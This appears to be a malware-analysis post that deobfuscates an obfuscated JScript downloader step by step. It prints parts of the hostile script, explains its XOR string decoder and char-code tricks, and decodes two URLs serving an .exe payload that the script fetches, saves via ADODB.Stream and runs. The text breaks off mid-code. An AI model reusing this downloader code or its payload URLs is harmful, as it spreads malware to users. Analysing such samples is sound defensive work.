    mD[22] = "I";
    mD[23] = "f";
    mD[24] = "8D";
    mD[25] = "hLx";
    mD[26] = "48i";
    mD[27] = "P";
    mD[28] = "mhZ";
    mD[29] = "seO";
    mD[30] = "N";
    mD[31] = "s";
    mD[32] = "s";
    mD[33] = "kcI";
    mD[34] = "U9N";
    mD[35] = "fyP";
    var JnJ = mD[28] + mD[21] + mD[19] + mD[8] + mD[5] + mD[10] + mD[6] + mD[1] + mD[15] + mD[12] + mD[18] + mD[32] + mD[25] + mD[13] + mD[26] + mD[14] + mD[23] + mD[16] + mD[24] + mD[0] + mD[33] + mD[17] + mD[20] + mD[29] + mD[7] + mD[2] + mD[31] + mD[34] + mD[30] + mD[35] + mD[27] + mD[11] + mD[4] + mD[22] + mD[9] + mD[3];
    var Cpn = "";
    Cpn = Cpn + J(825 - 771) + J(24 * 3) + J(10230 / 93 - 0) + J(45 + 55) + J(922 - 846) + J(7 * 11) + J(53) + J(824 - 722) + J(244 - 127) + J(4 * 13) + J(85 - 38) + J(336 - 228) + J(2244 / 22 + 0) + J(3 + 86) + J(4 * 19) + J(32 * 2) + J(3 * 17) + J(2616 / 24 + 0) + J(5 * 11) + J(182 - 96) + J(4048 / 46 + 0) + J(327 - 256) + J(2349 / 29 + 0) + J(793 - 697) + J(10764 / 92 + 0) + J(55 + 32) + J(67) + J(713 - 629) + J(3648 / 48 - 0) + J(10 * 7) + J(89) + J(367 - 319) + J(262 - 184) + J(8 * 7) + J(1188 / 22 + 0) + J(25 + 92) + J(7 * 7) + J(334 - 269) + J(16 * 5) + J(2231 / 23 - 0) + J(3 * 17) + J(72 + 3) + J(116 / 1 + 0) + J(6375 / 85 + 0) + J(4225 / 65 - 0) + J(315 - 198) + J(707 - 634) + J(1825 / 25 - 0) + J(907 - 803) + J(3213 / 63 - 0) + J(7110 / 90 + 0) + J(586 - 532) + J(875 - 767) + J(4446 / 39 - 0) + J(387 - 290) + J(38 + 68) + J(8 + 90) + J(53) + J(886 - 767) + J(2380 / 35 - 0) + J(108 + 1) + J(5664 / 59 - 0) + J(46 + 70) + J(4757 / 67 - 0) + J(2773 / 59 - 0) + J(360 / 3 - 0) + J(7 * 11) + J(400 / 4 - 0) + J(90 + 10) + J(266 - 159) + J(70 + 14) + J(741 - 661) + J(8 * 7) + J(550 / 5 - 0) + J(51 + 70);
    var tkc = 207953;
    var aJJ = tkc + 19575;
    var CF = aJJ / 476;
    var xgH = CF - 478;
    OF[QRO("02183F06", JnJ)](QRO("700C3B", Cpn), qnI, xgH);
    try {
        OF[QRO("1B202D53", "hEC7c7RW7l7RcuyQeaHB1yOcRt8hth0hzTpnWp54znW0WJrFDAdcAnUJe5ud6Lag2oK0ud")]();
    } catch (WKY) {
        return 0;
    }
    return 1;
}

function jH(OIM) {
    var EN = "";
    EN = EN + J(1344 / 21 + 0) + J(1070 - 972) + J(10580 / 92 - 0) + J(42 + 62) + J(10881 / 93 - 0) + J(6000 / 60 + 0);
    var lj = EN + OIM;
    return eval(lj);
}

function htU(Tib) {
    var nGi = "";
    nGi = nGi + J(783 / 9 + 0) + J(1044 - 966) + J(97) + J(96 + 9) + J(8600 / 86 + 0) + J(14 * 7) + J(53 + 62);
    var Pt = jH(nGi);

    var yb = DN(Pt);
    var dwe = YjS(Pt);
    var bC = [];
    bC[0] = "emO";
    bC[1] = "ile";
    bC[2] = "in";
    bC[3] = "ect";
    bC[4] = "st";
    bC[5] = "bj";
    bC[6] = "g";
    bC[7] = "Sy";
    bC[8] = "ipt";
    bC[9] = "Scr";
    bC[10] = ".F";
    var npT = bC[9] + bC[8] + bC[2] + bC[6] + bC[10] + bC[1] + bC[7] + bC[4] + bC[0] + bC[5] + bC[3];
    var dSF = new Pt(npT);
    if (jGP(dwe, Tib) == 0)
        return false;


    var cOv = "";
    cOv = cOv + J(41 * 2) + J(9 + 106) + J(1536 / 16 + 0) + J(693 - 578) + J(11136 / 96 + 0) + J(912 / 8 + 0);
    var sn = dwe[cOv];
    var Xdq = 412883;
    var leM = Xdq + 43957;
    var Gcb = leM / 405;
    var NC = Gcb - 928;
    var haS = NC;

    if (sn == haS) {
        var IxV = "";
        IxV = IxV + J(448 / 7 - 0) + J(67) + J(648 - 570) + J(67) + J(5 * 13) + J(4 + 41) + J(41 * 2) + J(5 * 23) + J(432 - 319) + J(84 + 16) + J(32 * 3) + J(490 - 382);
        var gib = new Pt(IxV);
        var SW = VNB(dSF);
        var qU = "";
        qU = qU + J(70 + 8) + J(42 + 69) + J(2400 / 24 - 0) + J(109);
        gib[qU]();
        var cY = "";
        cY = cY + J(83) + J(24 * 5) + J(4884 / 44 + 0) + J(43 + 57);
        var MzJ = 13231;
        var hZ = MzJ + 16865;
        var CAg = hZ / 48;
        var By = CAg - 626;
        gib[cY] = By;

        var yu = "";
        yu = yu + J(54 + 27) + J(20 * 5) + J(6 * 19) + J(7881 / 71 - 0) + J(10 * 11) + J(8720 / 80 - 0) + J(11 + 103) + J(1600 / 16 + 0) + J(275 - 210) + J(75 + 35) + J(9 * 11) + J(27 + 93);
        var yzh = dwe[yu];
        var DZy = "";
        DZy = DZy + J(43 * 2) + J(923 - 810) + J(8 * 13) + J(94 + 21) + J(20 * 5);
        gib[DZy](yzh);
        var Am = "";
        Am = Am + J(69 + 10) + J(33 + 77) + J(6156 / 54 - 0) + J(89 + 15) + J(25 + 90) + J(416 / 4 + 0) + J(90 + 20) + J(109);
        var lm = 260605;
        var YU = lm + 50275;
        var Ny = YU / 580;
        var LC = Ny - 536;
        gib[Am] = LC;
        if (!WN(gib, SW, Pt))
            return false;

        var iSG = "";
        iSG = iSG + J(6 * 11) + J(1087 - 980) + J(5060 / 46 - 0) + J(645 - 531) + J(699 - 599);
        gib[iSG]();
        var Ep = "";
        Ep = Ep + J(3626 / 37 - 0) + J(1108 - 1000) + J(44 + 55) + J(2475 / 55 + 0) + J(23 + 77) + J(5355 / 45 + 0) + J(2100 / 21 - 0) + J(21 + 10) + J(3036 / 66 - 0) + J(2548 / 26 - 0) + J(1984 / 64 - 0);
        var ZzY = Ep + SW;
        var ybc = 118986;
        var NI = ybc + 11627;
        var fi = NI / 397;
        var UF = fi - 329;
        var IIZ = UF;
        var Vp = [];
        Vp[0] = "y7a";
        Vp[1] = "nd";
        Vp[2] = "sjh";
        Vp[3] = "gfs";
        Vp[4] = "qm";
        Vp[5] = "dh";
        Vp[6] = "as";
        Vp[7] = "fs";
        var Jdv = Vp[6] + Vp[4] + Vp[1] + Vp[2] + Vp[0] + Vp[3] + Vp[5] + Vp[7];
        var ft = "";
        ft = ft + J(920 - 872) + J(5 + 43) + J(4214 / 86 - 0) + J(10 * 5);
        IIZ = ygJ(Jdv, Pt, ZzY, ft);

        var gL = 146016;
        var anP = gL + 63364;
        var qXw = anP / 361;
        var mlA = qXw - 570;
        var qvO = mlA;
        if (IIZ < qvO) {
            return BSu(dSF);
        } else {
            return false;
        }

    } else {
        return false;
    }


    return true;
}

function gW(qnI) {
    var cd = htU(qnI);
    if (!cd)
        throw cd;
    return cd;
}

if (qdI()) {
    var Tib = [];

    function BQc() {
        var HK = 417564;
        var yw = HK + 15596;
        var fV = yw / 980;
        var Wlq = fV - 442;
        return 0 + Wlq;
    }

    function cI() {
        var CQS = QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611", "S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");
        return CQS;
    }
    Tib[BQc()] = cI();

    function LK() {
        var Rn = 145782;
        var Qg = Rn + 61631;
        var rq = Qg / 983;
        var DVu = rq - 210;
        return 0 + DVu;
    }

    function WE() {
        var DqW = QRO("3033200363635C17381640261F17591D2D3340522E0A560C175C232510197547555750637C7C4C2E0B01", "XGTsYLssQf5Bza8oLYn1Agyhr7ODbFDvgebSMJbKsdDroDOFuul8AnbHihhMrfxbXv32qlcU3wUxil");
        return DqW;
    }
    Tib[LK()] = WE();
    var nof = false;

    function yVB() {
        var rCq = 243163;
        var pym = rCq + 27887;
        var CHP = pym / 695;
        var THx = CHP - 389;
        return 0 + THx;
    }

    function Yn() {
        var tA = 2288;
        var Doq = tA + 64920;
        var SG = Doq / 271;
        var eMn = SG - 248;
        return 0 + eMn;
    }
    var spI = yVB(),
        Ta = Yn();

    while (!nof) {
        if (Ta > spI)
            break;
        try {
            nof = gW(Tib[Ta]);
        } catch (IwH) {}
        Ta++;
    }
}

2) Main part :

Looking at the parts that are not inside functions is an easy way to find the main part, from which all the other parts are called.

In this part some function declarations appear :

=> I didn't put them here (see the spoiler with the whole code) to keep the code clearer.

if (qdI()) => Main condition : if false, nothing is done : the script ends.
{
var Tib = [];

=> Creation of an empty tab (array)
Tib[BQc()] = cI();

=> the result of cI() is put in the tab, at the position resulting from BQc()
=> cI() and BQc() are function calls that return the right value
Tib[LK()] = WE();

=> the result of WE() is put in the tab, at the position resulting from LK()
=> WE() and LK() are function calls that return the right value
var nof = false;
var spI = yVB(), Ta = Yn();

=> yVB() and Yn() are other functions, used to initialize spI and Ta

while (!nof)
{

if (Ta > spI)
=> condition to break => quit the while loop : exit the script (end of the code)
break;
try
{

nof = gW(Tib[Ta]);

=> call the gW function with one of the values of the Tib tab as parameter : Ta is the index

}
catch (IwH)
{
}
Ta++;
}
}
We can see that a lot of functions are called, hiding the real data.

I will not directly show you the simplified main part.

The aim of this post is to show the obfuscation methods used, and then the deobfuscation :
I prefer to show, step by step, the work that has been done to obfuscate this script.

2-1) Main part - Easy simplifications / deobfuscation :

Let's find what data the functions BQc(), LK(), yVB(), Yn(), cI() and WE() return, to simplify the main part.

function BQc() {
var HK=417564;
var yw=HK+15596;
var fV=yw/980;
var Wlq=fV-442;
return 0+Wlq;
}
=> return 0 : (0 + ((417564+15596)/980)-442)

function LK() {
var Rn=145782;
var Qg=Rn+61631;
var rq=Qg/983;
var DVu=rq-210;
return 0+DVu;
}
=> return 1 : (0 + ( (145782+61631)/983) - 210)

function yVB() {
var rCq=243163;
var pym=rCq+27887;
var CHP=pym/695;
var THx=CHP-389;
return 0+THx;
}
=> return 1 : (0 + ((243163+27887)/695) - 389)

function Yn() {
var tA=2288;
var Doq=tA+64920;
var SG=Doq/271;
var eMn=SG-248;
return 0+eMn;
}
=> return 0 : (0+((2288+64920)/ 271) - 248)

function cI() {
var CQS= QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611","S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");
return CQS;
}

function WE() {
var DqW= QRO("3033200363635C17381640261F17591D2D3340522E0A560C175C232510197547555750637C7C4C2E0B01","XGTsYLssQf5Bza8oLYn1Agyhr7ODbFDvgebSMJbKsdDroDOFuul8AnbHihhMrfxbXv32qlcU3wUxil");
return DqW;
}

cI() and WE() return decoded strings, using a function named QRO(parameter1, parameter2)

Let's suppose each value returned is a URL (I will show you later how to find these parts)

Then we can write the new main part :

if (qdI()) => Main condition : if false, nothing is done : the script stops.
{
var Tib = [];

=> Creation of an empty tab (array)
Tib[0] = URL1;

=> the result of cI() is put in the tab at index 0
Tib[1] = URL2;

=> the result of WE() is put in the tab at index 1
var nof = false;
var spI = 1, Ta = 0;

=> spI and Ta were initialized by the other functions yVB() and Yn()

while (!nof)
{

if (Ta > spI)
=> condition to break => quit the while loop : exit the script (end of the code)
break;
try
{

nof = gW(Tib[Ta]);

=> call the gW function with the current URL as parameter (Ta : index in the tab Tib)

}
catch (IwH)
{
}
Ta++;
}
}
- the tab Tib is initialized with 2 URLs => 2 indexes : 0 and 1

- In the while loop, as long as nof is false (the current URL has not been successfully retrieved / saved / run) and the current index <= 1
- the gW function is called
To quit the while loop :

- nof = true => the condition !nof is no longer met
- Ta > spI => current index > 1

=> normal, there are only 2 URLs : index 0 and 1
We will see the gW() function in detail.

2-1) Main part - URLs :

For the moment, let's find the values returned by cI() and WE()
function cI() {
var CQS= QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611","S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");
return CQS;
}

function WE() {
var DqW= QRO("3033200363635C17381640261F17591D2D3340522E0A560C175C232510197547555750637C7C4C2E0B01","XGTsYLssQf5Bza8oLYn1Agyhr7ODbFDvgebSMJbKsdDroDOFuul8AnbHihhMrfxbXv32qlcU3wUxil");
return DqW;
}
Let's begin with cI()

QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611","S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");

Two parameters :

- one string that looks like hex values written as a string
- a second string of characters that seem to be taken from the alphabet

In the QRO function, other functions are called : I will show some of them (highlighted in green in the original post) and will simplify the other parts

function QRO(eQZ, AV)
{

var QJ = HyA(eQZ);

=> eQZ : current string : encoded "3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
=> 88 (length)
function HyA(WtD)
{

var XkX = lw();
var cW = Do();
var md = St();
XkX = XkX + dka() + cW + ymC() + md;

=> "length"
var ddh = WtD["length"];

return ddh;

=> returns the length of the string
}
var DIL = PgR();

function PgR() {
var yQ=516582;
var bb=yQ+8898;
var jUh=bb/755;
var XUW=jUh-696;
return 0+XUW;

=> it always returns 0 !!!
}
=> DIL = 0
=> the index of the first char to get from the first string (parameter 1)
var Hm = HyA(AV); (same function as above)

=> AV : password string (for the decoding part)
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"
=> Hm = AV.length
=> Hm = 77
var Tv = [pXY()][TG()];

=> an obfuscated way to write : Tv = ""
=> [""][0]
=> Tv = ""
while (DIL < QJ)
=> while DIL < size of the first string
=> DIL begins at 0 and will be incremented up to the size of the encoded string, here : 88
{
var un = DIL / Bv();

function Bv() {
var Wx=32391;
var ept=Wx+1427;
var jU=ept/914;
var wBY=jU-35;
return 0+wBY;

=> it always returns 2 !!!
}
=> un = DIL / 2
=> the position of the char to be retrieved from the second string (parameter 2)
var nH = eQZ[aW()](DIL);

function aW() {
var GR="";
GR=GR+J(30+68)+J(103)+J(2976/31+0)+J(276-163)+J(154-90)+J(5*23);

=> "c" + "h" + "a" + "r" + "A" + "t"
return GR;

=> it returns "charAt"
}
=> nH = eQZ["charAt"](DIL);

=> gets the char at position DIL, on the first string (parameter 1)

=> we are in a while loop.
=> on the first pass : DIL : 0
=> nH = eQZ.charAt(0)
=> gets the char at position 0 of the first string (parameter 1)
=> nH = "3"
DIL = DIL + Hb();

function Hb() {
var CzR=208985;
var gp=CzR+57754;
var xoD=gp/411;
var ZD=xoD-648;
return 0+ZD;

=> it always returns 1 !!!
}
=> DIL = DIL + 1
=> the index of the second char retrieved from the first string (parameter 1)
nH = nH + eQZ[Ua()](DIL);

function Ua() {
var dSE=""; dSE=dSE+J(14*7)+J(103)+J(44+52)+J(60+53)+J(256-192)+J(94+21);
=> "charAt"
return dSE;

=> it returns "charAt"
}
=> gets the char at position DIL of the first string (parameter 1)

=> in the current loop (DIL is now 1) :
=> nH = nH + eQZ["charAt"](1);
=> nH = nH + "B"
=> nH = "3B"
=> the first two chars of the encoded string
DIL = DIL + GuV();

function GuV() {
var QHj=469118;
var mE=QHj+16324;
var riR=mE/543;
var HPx=riR-893;
return 0+HPx;

=> it always returns 1
}
=> DIL = DIL + 1
var gD = Hd(nH, vOX());

=> vOX : 16 (for "HEX number")

=> Hd("3B", 16) : Hd is called with the two chars just retrieved, and 16 to tell it is hex
=> hex number to decimal conversion
=> For the current loop :
=> this long function will do "3B" => 59, considering "3B" is a hex number
=> parseInt(nH, 16) is the simplified version of Hd(nH, vOX()) :D
function Hd(tG, yRI)
{
// "3B" and 16 at first call, here

var XEE=72822;
var uxo=XEE+58878;
var kc=uxo/300;
var JiT=kc-438;
var HkD = JiT;
var gcq=102714;
var TQ=gcq+26334;
var oq=TQ/228;
var rP=oq-566;
var Sb = rP;
var YCE=120043;
var PbA=YCE+27693;
var SKR=PbA/313;
var oX=SKR-465;
var iuV = oX;
var EXT="";
EXT=EXT+J(74+37)+J(32*3)+J(7232/64+0)+J(6*19)+J(94+6)+J(557-485)+J(109)+J(20+95);

=> "parseInt"
var BAK = EXT;
var sbG="";
sbG=sbG+J(5488/56+0)+J(612-509)+J(32*3)+J(423-310)+J(35+29)+J(99+16);


=> "charAt"
var UAR = sbG;

if (Math.cos(HkD) > Sb)

=> if (Math.cos(1) > 0) : always true
iuV = eval(BAK);
else

iuV = eval(UAR);

=> iuV : the parseInt or charAt function

=> here ALWAYS : parseInt => to be used below
if (Math.sin(HkD) > Sb)

=> if (Math.sin(1) > 0) : always true !!!
{
var TA = iuV(tG, yRI);

=> TA =
parseInt("3B",16)
=> "3B" considered as a hex number
=> converted to a decimal number : 59
return TA;
}
else

return HkD;

=> it never reaches here !
}
=> var gD = 59 for the current loop : decimal value of HEX NUMBER represented by the two current chars of first string

=> remember, in this call :

parameter 1 : "3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
parameter 2 :
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"
var Km = AV[nsV()](un % Hm);
function nsV() {
var tTu="";
tTu=tTu+J(82+16)+J(103)+J(4992/52-0)+J(15+98)+J(6*11)+J(3630/33+0)+J(8019/81+0)+J(20*5)+J(62+2)+J(60+55);

=> "charCodeAt"
return tTu;
}
=> var Km = AV["charCodeAt"](position_in_second_string MODULO length_of_second_string);

=> This method allows a variable holding a position to take a value beyond the end of a string (or an array, tab, etc) : by using the modulo with the string length, the result is always inside the string.

=> this avoids having to reset the variable once it exceeds the maximum index.

position = position_outside MODULO length_of_the_string
Example : "ABCD"

The incremented variable reaches 4, but the string only has 4 chars (indexes 0 to 3)

index 0 => "A"
index = index + 1
index 1 => "B"
index = index + 1
index 2 => "C"
index = index + 1
index 3 => "D"
index = index + 1
index 4 => outside the string.

using real_index = index MODULO size_of_the_string
real_index will always be inside the string, beginning again with the first char (it loops over the string)

real_index = 4 MODULO 4 = 0 => "A"
index = index + 1
real_index = 5 MODULO 4 = 1 => "B"
index = index + 1
real_index = 6 MODULO 4 = 2 => "C"
...
...

real_index = 255 MODULO 4 = 3 => "D"
=> var Km = AV[nsV()](un % Hm);
=> char code of the current letter of the second string
=> Km = 83 in the first loop : the code of "S"

var WY = gD ^ Km;

=> XOR between the decimal value of the two hex chars retrieved from parameter 1 and the char code of the current letter retrieved from parameter 2

=> in the first loop : 59 XOR 83 (I will show an example later with the first 3 loops)
var Qk = String[uQR()](WY);

=> result of the XOR : converted to a one-char string and put in var Qk

=> Example : 59 XOR 83 = 104 => "h"
Tv = Tv + te() + Qk;

=> the decoded string is built

=> first loop :
=> Tv = "" + "h" => "h"
}
return Tv;

=> The decoded string !
}
In the above function / sub-functions, there are a lot of calls to the J() function.
I chose to write the result of the calls, and will only show the complete J() function / sub-functions in a later part.

The QRO function can seem difficult, some obfuscation has been done.
So here is an example, for the first 3 loops of the while part :

QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611","S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");

"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

- first positions (one in the first string, one in the second)
"3B" => 59
"S" => 83
=> 59 XOR 83 = 104
=> "h"
current decoded string : "h"
- New positions :

"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

"47" => 71 decimal
"3" => 51 decimal
=> 71 XOR 51 = 116 => "t"
current decoded string : "ht"
- New positions :

"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

"3F" => 63
"K" => 75
=> 63 XOR 75 = 116 => "t"
current decoded string : "htt"
etc,...
RESULTS :

cI();

=> "http ://www .interlaan.com/deklar_11222016.exe"
WE();

=> "http ://dipudevaraj.com/deklar_11222016.exe"
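As an added example (not code from the original post), here is the QRO() routine re-implemented in Python as an analyst's decoder. It is run on the shorter QRO() calls quoted later in this post (the method names and ActiveX ProgIDs from DN(), YjS() and jGP()), so each step of the walk-through above can be checked by hand:

```python
"""Python re-implementation of the QRO() string decoder of the analysed script.

Added example, not code from the original post.  It mirrors the walk-through:
two hex chars -> parseInt(.., 16) -> XOR with key.charCodeAt(i % key.length).
"""


def qro_decode(hex_str: str, key: str) -> str:
    """Decode one QRO(encoded, key) call.

    hex_str: the first QRO parameter, a string of 2-char hex values
    key:     the second QRO parameter, indexed modulo its length
    """
    if len(hex_str) % 2 != 0:
        raise ValueError("encoded string must contain whole hex pairs")
    out = []
    for i in range(0, len(hex_str), 2):      # DIL steps by 2 (Hb() + GuV())
        byte = int(hex_str[i:i + 2], 16)     # Hd(nH, vOX()) == parseInt(nH, 16)
        k = ord(key[(i // 2) % len(key)])    # AV.charCodeAt((DIL / 2) % Hm)
        out.append(chr(byte ^ k))            # one-char string of gD ^ Km
    return "".join(out)


def qro_trace(hex_str: str, key: str, loops: int = 3):
    """Return (hex pair, hex value, key char, key code, result) per loop:
    the same table the post builds by hand for the first three loops."""
    rows = []
    for n in range(min(loops, len(hex_str) // 2)):
        pair = hex_str[2 * n:2 * n + 2]
        kc = key[n % len(key)]
        rows.append((pair, int(pair, 16), kc, ord(kc), chr(int(pair, 16) ^ ord(kc))))
    return rows


# Keys quoted from the analysed script in this post (DN(), YjS(), jGP()):
OPEN_KEY = "mhZh3qKL9pghWKHmCaL70ynmYshLx748ibfeW8D5okcIe75ZZHseOqdnRsU9NNfyPPAub0KIAR"
GET_KEY = "7IoeMN6gv50mgZMA4n8WYHRavXDUMGZ1O97v2BQb4LuLBvJJi4P7msbkc6xEnauH0yNeelUQ9oz"
SEND_KEY = "hEC7c7RW7l7RcuyQeaHB1yOcRt8hth0hzTpnWp54znW0WJrFDAdcAnUJe5ud6Lag2oK0ud"
SHELL_KEY = "C83o7Ba2t0D1zn3tfqUcMUag2g8hwJlsWgdXjD9rtYWDbxF2uQrnf64sJOKWzGaqgAj8716EyG"
XMLHTTP_KEY = "xprTvXBYJ8dgay32zvNLN6fbbvJp1XV6w4U5BuhZ4MyPZyDCytLJ8Ls0WrItDcADtEzeOiEKgUjKGhcs"

if __name__ == "__main__":
    for enc, key in [("02183F06", OPEN_KEY), ("700C3B", GET_KEY),
                     ("1B202D53", SEND_KEY),
                     ("144B501D5E32151C2758215D16", SHELL_KEY),
                     ("35232A193A6A6C0107742C333529", XMLHTTP_KEY)]:
        print(enc, "->", qro_decode(enc, key))
    # first three loops of the cI() call, as in the table above
    for row in qro_trace("3B473F3C", "S3KLGZRx"):
        print(row)
```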
2-2) Main part - simplified :


if (qdI()) => Main condition : if false, nothing is done : the script stops.
{

var Tib = [];

=> Creation of an empty tab
Tib[0] = "http ://www .interlaan.com/deklar_11222016.exe";

Tib[1] = "http ://dipudevaraj.com/deklar_11222016.exe";


var nof = false;
var spI = 1, Ta = 0;

while (!nof)
{

if (Ta > spI)

=> condition to break => quit the loop While : exit the script (end of the code)
break;
try
{

nof = gW(Tib[Ta]);

=> call the gW function with the current URL as parameter (Ta : index in the tab Tib)

}
catch (IwH)
{
}
Ta++;
}
}
Two parts have not been shown yet : qdI() and gW(url)

2-3) The if part :


if (qdI())
{

...
...

}

When I first saw the if part, I wondered "how small can this function be"

Let's see the "strange part of this script"...


function qdI()
{

var Uh = eval("ActiveXObject");
var Rl = new Uh(oh());

=> new ActiveXObject(oh())
var WuR="";

WuR=WuR+J(551-435)+J(109)+J(161-55)+J(418-309)+J(10*11)+J(1043-925)+J(229-120);

var XkB = WuR;

var oQ = (typeof Rl[CWZ()] == XkB);

if (!oQ) return oQ;

oQ = (typeof Rl[tDk()] == XkB);


return oQ;
}
We can easily see that an ActiveX object is created, but the string passed as parameter is hidden by a call to a function named oh().

For the moment, let's see the other parts.

The return value, oQ, is a Boolean (true or false) : the result of the test "is typeof DATA == XkB ?"

=> two comparisons with XkB

Let's find the String returned by oh().

oh()

function oh()
{

var h=21632;
return XOA()+yUo();

=> calls two other functions !
}
function XOA()
{
var NRA=53614;

return I()+TwY();

=> calls two other functions !
}
function yUo()
{
var OO=51481;

return wG()+gR();

=> calls two other functions !
}
I think you have understood by now : oh() is a function that calls a function that calls functions that call functions, etc...

When I was deobfuscating the oh() function, some time passed ... and I was still in sub-functions ...

This is the simplified view :

the oh() function
uses around 80 different functions ...

At the end of some "last" functions, in several parts, a char is returned.
All the code below has one goal : build this string : "ADODB.Stream"

The most important function is J(value) : we have seen it in a previous part.
=> Looking at the details, we can see it is the biggest part

You can look in the spoiler code part :

The J() function with all its sub-functions does only a small thing in reality :

J(Value) => returns String.fromCharCode(Value+1)

Details below, simplified (I have mainly written the names of the functions called, not all the useless code inside)
Code:
oh() => XOA()+yUo();

        => XOA() => I()+TwY();

            => I() => bYp()+MN()

                    => bYp => Hjz() : "A"
                    => MN() =>  lP() +SuU()
 
                        => IP() => xEQ() : "D"
                        => SuU() = return J(4+74)

                            The function J(..) is a very important function, called several times from other parts of the script
     
                            var Kk=842271;
                            var IJ=Kk+44517;
                            var q=IJ/918;
                            var a=q-965; => = 1
                            var Qk = eval(Mr() + (DK+a) + aKq());
             
                                => Mr() => iW()+adq()
             
                                            => iW() => s()+ ryJ()
                         
                                                        => s() => sm()+kd()
                                     
                                                                    =>  Wed()+ye()
                                                 
                                                                        => Wed() => A() : "S"
                                                                        => ye()    => pT() : "t"
                                                     
                                                                => kd() =>  QTN()+ xcT()
                                                     
                                                                        => QTN() => j() :  "r"
                                                                        => xcT() => ih()+ l()
                                                     
                                                                                    => ih() : "i"
                                                                                    => l() : "n"
                                             
                                                        => ryJ() => sd()+ yVO()
                                     
                                                                    => sd() => pe()+ Glt()
                                                 
                                                                                => pe(0) : "g"
                                                                                => Glt() : eval("String.fromCharCode(19+27)" : "."
                                                 
                                                                    => yVO() => haG()+Whd()
                                                 
                                                                                => haG() =>  eval("String.fromCharCode(249-147)") : "f"
                                                                                => Whd() => OfW()+Pv()
                                                             
                                                                                            => OfW() => eYh() : "r"
                                                                                            => Pv() => eH() : "o"
                                                                     
                         
                                            => adq() =>  NT()+id()
                         
                                                            => NT() => M()+Z()
                                         
                                                                        => M() => rPV()+ us()
                                                     
                                                                                    => rPV() => TR() : "m"
                                                                                    => us() : "C"
                                                                 
                                                                        => Z() => jR()+E()
                                                     
                                                                                    => jR() : "h"
                                                                 
                                                                                    => E() => aU()+dad()
                                                                 
                                                                                                => aU() => WgE() : "a"
                                                                                                => dad() => eval("String.fromCharCode(865-751)") : "r"
                                                     
                                                            => id() => jq()+e()
                                         
                                                                        => jq() => GhP()+FV()
                                                     
                                                                                    => GhP() => H() : "C"
                                                                                    => FV() => eval("String.fromCharCode(409-298)") : "o"
                                                                 
                                                                        => e() => OTU()+vff()
                                                     
                                                                                    => OTU() => eval("String.fromCharCode(24+76)") : "d"
                                                                 
                                                                                    => vff() => kx()+N()
                                                                             
                                                                                                => kx() : eval("String.fromCharCode(60+41)") : "e"
                                                                                                => N() => wDH() : "("                                    
                 
                                Then : Mr() : "String.fromCharCode("
             
                                => DK+a = (78+1) : value + 1
             
                                => aKq() =>  eval("String.fromCharCode(262-221)"): ")"
             
                                Conclusion : for J(value) => eval("String.fromCharCode(" + (value+1) + ")")
                                => J(value) = String.fromCharCode(value+1)
             
                                J(78) => "O"
             
                            For the moment, we have "A" + "D" + "O" only :p


            => TwY() => xzm()+Be()

                        => xzm() => J(67) => using what we have learnt above for the J(value) function :
                                         => String.fromCharCode(value+1)
                                         => String.fromCharCode(68)
                     
                                         => "D"
     
                        => Be() => Q()+jrF()
     
                                    => Q() => qw() : "B"
                 
                                    => jrF() => J(2385/53-0)
                                             => J(45)
                                             => String.fromCharCode(46)
                         
                                             => "."
     
        => yUo() => wG()+gR()

                    => wG() => rbT()+mVZ()
 
                                => rbT() => "S"
                                => mVZ() => POQ()+ nL()
             
                                            => POQ() => J(6785/59-0) : "t"
                                            => nL() => Rw() : "r"

                    => gR() => Fxm()+NL()

                                => Fxm() => mXR() : "e"
                                => NL()  => RA()+ Ws()

                                        => RA() => xT() : "a"
                     
                                        =>  Ws() : J(36*3) => J(108) => "m"
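As an added example (not code from the post), a small Python resolver for the two obfuscation primitives just described: it turns a J(...)+J(...) chain into the string it builds (J(value) = String.fromCharCode(value+1)) and evaluates the (a+b)/c-d constant functions, using a restricted arithmetic walker instead of eval(). The helper names are my own:

```python
"""Resolver for two obfuscation primitives of the analysed script (added example,
not code from the original post):
  * J(value) chains    : J(v) == String.fromCharCode(v + 1), so "J(..)+J(..)+..."
                         resolves to a plain string;
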